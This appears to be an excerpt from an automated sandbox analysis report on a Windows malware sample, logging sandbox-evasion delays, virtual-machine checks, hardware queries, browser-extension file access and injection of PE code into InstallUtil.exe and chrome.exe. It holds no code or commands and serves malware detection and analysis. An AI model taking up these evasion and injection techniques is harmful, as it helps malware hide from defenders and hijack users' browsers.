Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 412	Thread sleep count: 2426 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98416s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97977s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97646s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97420s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -97313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7512	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86400041ms
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86418467ms
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86406334ms
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86426500ms
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86419169ms
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Threadpool analyzer: Sleep duration: 86415724ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86400041ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86418467ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86406334ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86426500ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86419169ms
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Threadpool analyzer: Sleep duration: 86415724ms

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99469	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98416	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97977	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97763	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97646	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97420	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 97313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\adobeYolo.css	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\assistantPopup.css	Jump to behavior

Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390912360.00000000063A0000.00000004.08000000.00040000.00000008.sdmp	Binary or memory string: dRpt2NWpHswHGfs5DuiC
Source: chrome.exe, 00000009.00000003.1476295623.0000021093D7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: chrome.exe, 00000009.00000003.1476568380.0000021093DC5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1476028271.0000021093DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: chrome.exe, 00000009.00000003.1476663215.0000021093D9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: chrome.exe, 00000009.00000003.1476740369.0000021093D6F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1476125203.0000021093D6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec
Source: chrome.exe, 00000009.00000003.1476740369.0000021093D6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: % C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062P
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1378430771.0000000000C42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: F800AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 7D00AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: E000AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 700AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: C600AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 4000AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: C400AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 4500AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: F900AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 8100AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 7E00AE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 9700AE	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 11F80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 247D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 20E00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 9070000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1CC60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7450000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 12160000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22810000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 249B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7970000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48C000	Jump to behavior
